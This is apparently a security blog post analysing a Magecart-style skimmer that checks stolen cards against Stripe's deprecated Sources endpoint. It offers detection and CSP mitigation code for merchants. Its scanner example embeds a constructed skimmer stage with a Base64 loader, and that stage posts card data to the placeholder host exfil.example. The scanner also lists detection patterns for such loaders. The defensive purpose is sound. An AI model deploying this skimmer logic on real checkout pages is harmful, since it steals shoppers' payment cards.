Introduction
In a rapidly evolving threat landscape where eCommerce platforms remain prime targets, a newly uncovered web skimmer campaign reveals a troubling shift in how cybercriminals are innovating to maximize success and evade detection. Security researchers have identified a threat actor group exploiting a deprecated Stripe API endpoint to validate stolen card data in real time, allowing them to efficiently steal only valid credit card information.
As online merchants increasingly rely on third-party platforms such as WooCommerce, WordPress, and PrestaShop, attackers are turning these widely used systems into springboards for their operations. This blog explores the technical details, impact, and implications of the latest skimmer campaign, with a strong emphasis on detection strategies and best practices for mitigation.
The Rise of Intelligent Skimming Operations
Web skimming, also known as Magecart-style attacks, involves the injection of malicious JavaScript into eCommerce websites to steal sensitive data entered by customers—typically payment information. While skimming is not a new tactic, what makes this campaign particularly alarming is its use of the now-deprecated Stripe API endpoint (api.stripe[.]com/v1/sources) to perform real-time card validation before exfiltration.
According to researchers from Jscrambler and Source Defense, this technique ensures that the attackers’ backend infrastructure only receives legitimate and usable card information, thereby reducing noise, increasing operational efficiency, and minimizing the chances of early detection.
Timeline of Events and Discovery
- August 20, 2024: Campaign begins targeting eCommerce merchants.
- February 2025: Source Defense identifies and discloses a portion of the campaign.
- March 2025: Jscrambler publishes detailed analysis revealing the use of the deprecated Stripe API.
To date, at least 49 merchants have been confirmed as victims. While 15 of those sites have since removed the malicious scripts, the threat is still active and likely targeting a broader set of merchants.
Technical Deep Dive: How the Attack Works
Step 1: Exploiting Site Vulnerabilities
The attackers target popular platforms like WooCommerce, WordPress, and PrestaShop—often through known vulnerabilities or misconfigurations. Once a foothold is gained, they inject an obfuscated JavaScript loader.
Step 2: Loader Script Execution
The loader script performs the following actions:
- Decodes a Base64-encoded second-stage payload
- Injects and renders a counterfeit payment form that mimics the Stripe checkout interface
Step 3: Overriding Legitimate Stripe Form
The malicious skimming script hides the genuine Stripe iframe and overlays it with a clone, complete with a fake ‘Place Order’ button that replaces the real one. This fake interface is designed to be indistinguishable from the original.
Step 4: Validating Card Data
Once users input their payment details, the skimmer submits them to the deprecated api.stripe[.]com/v1/sources endpoint to validate the card in real time:
- Valid cards trigger a Base64-encoded data transfer to the attacker’s server
- Invalid cards result in an error prompt that mimics the standard UI, prompting the user to retry
Step 5: Data Exfiltration
The valid card data is then exfiltrated to attacker-controlled infrastructure in obfuscated, Base64-encoded HTTP requests. The operation ends with a fake error message that clears the form, leaving the user to believe a harmless glitch occurred.
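The five steps above leave traces that can be found statically, before a customer is ever affected. As an added example (not code from the original post or from the Jscrambler and Source Defense analyses), the following Node.js script scans inline script bodies for the traits just described: a Base64-encoded second stage handed to eval/Function, a reference to the deprecated api.stripe.com/v1/sources endpoint (including inside decoded Base64 literals), raw card inputs outside the Stripe iframe, and the genuine Stripe element being hidden. The indicator names, regular expressions and both sample scripts are constructed for this example; exfil.example is a placeholder host.

```javascript
// Added example: static indicator scan for Stripe-overlay skimmers. Not code
// from the post or from the cited reports; indicator names, patterns and the
// two sample scripts below are this example's own constructions.

const INDICATORS = [
  {
    id: 'deprecated-sources-endpoint',
    why: 'card validation against the deprecated Sources endpoint',
    test: (t) => /api\.stripe\.com\/v1\/sources/i.test(t),
  },
  {
    id: 'base64-stage-execution',
    why: 'atob() output handed to eval/Function/document.write or a new <script>',
    test: (t) =>
      /\batob\s*\(/.test(t) &&
      /(\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|createElement\s*\(\s*['"]script['"]\s*\))/.test(t),
  },
  {
    id: 'raw-card-fields',
    why: 'card number/CVC inputs outside the Stripe iframe (Elements never exposes these to the page)',
    test: (t) =>
      /autocomplete\s*=\s*["']cc-(number|csc|exp)["']|name\s*=\s*["'](card_?number|cvc|cvv)["']/i.test(t),
  },
  {
    id: 'stripe-element-hidden',
    why: 'genuine Stripe element/iframe hidden so an overlay can replace it',
    test: (t) =>
      /(__privateStripeFrame|StripeElement|stripe-element)[\s\S]{0,200}?(display\s*=\s*["']none["']|visibility\s*=\s*["']hidden["']|opacity\s*=\s*["']?0\b)/i.test(t),
  },
];

// Pull out long Base64-looking string literals and decode them so indicators
// hidden in a second stage are scanned too. The 40-char floor skips short
// identifiers; the printable check drops binary blobs (images, fonts) that
// also travel as Base64.
function decodeBase64Literals(text) {
  const decoded = [];
  const re = /["'`]([A-Za-z0-9+\/]{40,}={0,2})["'`]/g;
  for (const m of text.matchAll(re)) {
    const s = Buffer.from(m[1], 'base64').toString('utf8');
    if (s.length > 0 && /^[\t\n\r\x20-\x7e]+$/.test(s)) decoded.push(s);
  }
  return decoded;
}

// Scan one script body. Decoded stages are followed `depth` levels deep so a
// Base64 blob nested inside another Base64 blob still surfaces.
function scanScript(text, depth = 2, origin = 'raw') {
  const findings = [];
  for (const ind of INDICATORS) {
    if (ind.test(text)) findings.push({ id: ind.id, origin, why: ind.why });
  }
  if (depth > 0) {
    for (const stage of decodeBase64Literals(text)) {
      findings.push(...scanScript(stage, depth - 1, `decoded(${origin})`));
    }
  }
  return findings;
}

// Constructed benign checkout script: card data lives only inside the
// Stripe Elements iframe and never touches the merchant page.
const BENIGN = `
  const stripe = Stripe(publishableKey);
  const elements = stripe.elements();
  const card = elements.create('card');
  card.mount('#card-element');
  form.addEventListener('submit', async (e) => {
    e.preventDefault();
    const { error } = await stripe.confirmCardPayment(clientSecret, { payment_method: { card } });
    if (error) showMessage(error.message);
  });
`;

// Constructed second stage mirroring the described behaviour: hide the real
// element, overlay raw card inputs, validate via the deprecated endpoint,
// forward only valid cards, then show a fake error. Placeholder host only.
const SECOND_STAGE = `
  document.querySelector('.StripeElement').style.display = 'none';
  overlay.innerHTML = '<input name="cardnumber" autocomplete="cc-number"><input name="cvc">';
  fetch('https://api.stripe.com/v1/sources', { method: 'POST', headers: auth, body: params })
    .then(r => r.ok && fetch('https://exfil.example/c', { method: 'POST', body: btoa(JSON.stringify(card)) }))
    .finally(() => showError('Payment error, please try again'));
`;

// Constructed loader in the shape the text describes: one Base64 literal
// decoded with atob() and executed through Function().
const LOADER = `
  var p = "${Buffer.from(SECOND_STAGE).toString('base64')}";
  (new Function(atob(p)))();
`;

for (const f of scanScript(LOADER)) console.log(`${f.id} [${f.origin}]: ${f.why}`);
```

Run it over the concatenated inline scripts of a checkout page and over every first-party .js file the page loads; the benign sample yields no findings, while the loader yields one raw finding (the atob/Function pattern) and three more from the decoded stage. Treat any `decoded(...)` finding as high confidence, since legitimate checkout code has no reason to hide the Sources endpoint or card-field markup inside Base64.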
Adaptability: Expanding Beyond Stripe
The skimmer campaign is not limited to Stripe. Researchers found evidence of cloned payment forms impersonating Square and other providers. Additionally, the script adds cryptocurrency options (Bitcoin, Ether, Tether, and Litecoin) as decoy payment methods, possibly to increase the form’s legitimacy or even test other monetization channels.
Indications of Automation and Toolkits
One of the most notable features of the campaign is its customization:
- Each skimmer appears tailored for the specific merchant website it infects.
- The attacker infrastructure seems capable of dynamically generating the scripts.
This points to the use of a skimmer generation toolkit or builder, designed to customize the payload depending on the host’s branding and HTML structure. Such automation reduces manual effort and expands the scope and scalability of the attack.
Consequences for Merchants and Consumers
This campaign illustrates the growing sophistication of skimmer groups and the severe consequences of not securing payment platforms:
- For Merchants:
  - Reputational damage
  - Regulatory fines for non-compliance with PCI DSS
  - Loss of customer trust
- For Consumers:
  - Identity theft
  - Unauthorized financial transactions
  - Exposure of sensitive personal information
Detection and Mitigation Strategies
For Merchants
- Upgrade and Patch:
  - Keep platforms and plugins up to date
  - Apply security patches for WooCommerce, WordPress, PrestaShop and other components promptly; this campaign gains its foothold through known vulnerabilities and misconfigurations
- Content Security Policy (CSP):
  - Implement a strict CSP (nonces or hashes for inline scripts, no 'unsafe-inline' or 'unsafe-eval') that limits script-src to your own origin and js.stripe.com and connect-src to your own origin and api.stripe.com, and collect violation reports
  - Set the header at a layer the application code cannot rewrite (web server, CDN or WAF); a compromised template can otherwise simply weaken it
  - Know the limit: connect-src blocks exfiltration to attacker hosts, but it cannot distinguish a call to the deprecated /v1/sources endpoint from legitimate traffic to api.stripe.com
- Subresource Integrity (SRI):
  - Pin third-party scripts with integrity attributes where their content is fixed; SRI does nothing against a loader written directly into your own templates, which is how this campaign operates
- JavaScript Integrity Monitoring:
  - Use tools like Jscrambler to detect unauthorized script changes and client-side behaviour such as the genuine Stripe iframe being hidden or card fields appearing outside it
- Regular Code Audits:
  - Perform integrity checks of frontend code, templates and plugin output; search them for atob()/eval() loaders, long Base64 literals and references to api.stripe.com/v1/sources
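To make the CSP recommendation concrete, here is an added example (not code from the post or from Stripe) of a checkout-page policy built around Stripe.js, with a simplified allow-check that shows which of the skimmer's four network actions the policy stops. The Stripe hostnames follow Stripe's published CSP guidance; shop.example, exfil.example, the /csp-report path and the fixed nonce are placeholders for this example.

```javascript
// Added example: a Stripe-checkout CSP and a simplified allow-check that
// shows what the policy stops and does not stop for the skimmer described
// in this post. Not code from the post or from Stripe; hostnames other than
// Stripe's and the report path are placeholders.

// Build the Content-Security-Policy header value for the checkout page.
// `nonce` must be a fresh random value per response (crypto.randomBytes in
// production) echoed on the merchant's own <script nonce="..."> tags.
function checkoutCsp(nonce) {
  return [
    "default-src 'self'",
    // Only nonce-tagged inline scripts and Stripe.js may execute. Without
    // 'unsafe-inline' an injected <script> lacking the nonce is refused;
    // without 'unsafe-eval' a Base64 stage fed to eval()/new Function() is
    // refused even if the loader itself got in.
    `script-src 'self' 'nonce-${nonce}' https://js.stripe.com`,
    // fetch/XHR may only reach the page origin and Stripe's API.
    "connect-src 'self' https://api.stripe.com",
    "frame-src https://js.stripe.com https://hooks.stripe.com",
    // Violation reports are the detection signal: an exfiltration attempt
    // shows up here before any customer complains.
    "report-uri /csp-report",
  ].join('; ');
}

// Parse the policy into { directive: [sources] }.
function parseCsp(csp) {
  const out = {};
  for (const part of csp.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) out[name] = sources;
  }
  return out;
}

// Simplified matcher: 'self' against the page origin, otherwise an exact
// scheme+host match; fetch directives fall back to default-src when absent.
// Real CSP also handles wildcards, ports, paths and nonce/hash sources; this
// is enough to show the decisions for the requests in this campaign.
function cspAllows(csp, directive, url, pageOrigin) {
  const dirs = parseCsp(csp);
  const sources = dirs[directive] || dirs['default-src'] || [];
  const origin = new URL(url).origin;
  return sources.some((src) =>
    src === "'self'" ? origin === pageOrigin : !src.startsWith("'") && src === origin);
}

// Decisions for the four network actions the skimmer needs.
function skimmerDecisions(pageOrigin = 'https://shop.example') {
  const policy = checkoutCsp('cGxhY2Vob2xkZXItbm9uY2U'); // placeholder nonce
  return {
    // legitimate Stripe.js load: allowed
    stripeJs: cspAllows(policy, 'script-src', 'https://js.stripe.com/v3/', pageOrigin),
    // remote second stage from attacker infrastructure: blocked and reported
    remoteStage: cspAllows(policy, 'script-src', 'https://cdn.exfil.example/loader.js', pageOrigin),
    // card validation against the deprecated endpoint: ALLOWED. It is the
    // same host as the legitimate API, so connect-src cannot tell them apart.
    sourcesApi: cspAllows(policy, 'connect-src', 'https://api.stripe.com/v1/sources', pageOrigin),
    // exfiltration of validated cards: blocked and reported
    exfil: cspAllows(policy, 'connect-src', 'https://exfil.example/c', pageOrigin),
  };
}

console.log(skimmerDecisions());
```

The result is the practical boundary of CSP here: it denies the remote loader and the exfiltration request, and the violation reports give you an early alarm, but it allows the validation call because api.stripe.com is a legitimate destination. Two caveats follow. The header must be emitted by the web server, CDN or WAF rather than by application templates, since an attacker who can edit the checkout template can also read the nonce or strip the policy. And the /v1/sources traffic needs a different control, such as the script-integrity monitoring and code audits listed above, because no connect-src rule will single it out.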
For Developers
- Validate all third-party dependencies
- Avoid using deprecated APIs and regularly audit your integration points
For Consumers
- Use virtual cards for online payments
- Monitor account statements for unauthorized transactions
- Enable alerts for real-time purchase notifications
Broader Implications: The Hidden Dangers of Deprecated APIs
This campaign exposes a critical blind spot in application security: the continued presence and accessibility of deprecated APIs. While Stripe officially replaced the Sources API with the PaymentMethods API in May 2024, the old endpoint still answers requests, and many legacy integrations and third-party plugins may still rely on or expose it.
What can be done?
- API providers should monitor and enforce deprecation timelines
- Merchants must audit their platforms for outdated integrations
- Security tools need to evolve beyond file-based detection and analyze behavior
Final Thoughts: A Call to Action
The Stripe API skimmer campaign represents the convergence of technical ingenuity and operational discipline in modern threat campaigns. By leveraging an old yet functional API, attackers were able to streamline their data collection process while minimizing exposure.
The real lesson here is two-fold:
- Legacy systems and integrations are an overlooked risk. If an API or feature has been deprecated, it should be disabled or replaced promptly.
- Security is a shared responsibility. Developers, merchants, and end-users must all take proactive steps to harden systems and detect anomalous behavior early.
As the threat landscape continues to evolve, organizations must prioritize continuous monitoring, automated defense strategies, and employee awareness to stay ahead of highly adaptive threat actors.
Stay Informed, Stay Secure.
If you’re a merchant using Stripe or any payment gateway, now is the time to audit your integrations and monitor for suspicious JavaScript activity. With the right tools and vigilance, even the most sophisticated skimmer campaigns can be identified and mitigated before significant damage is done.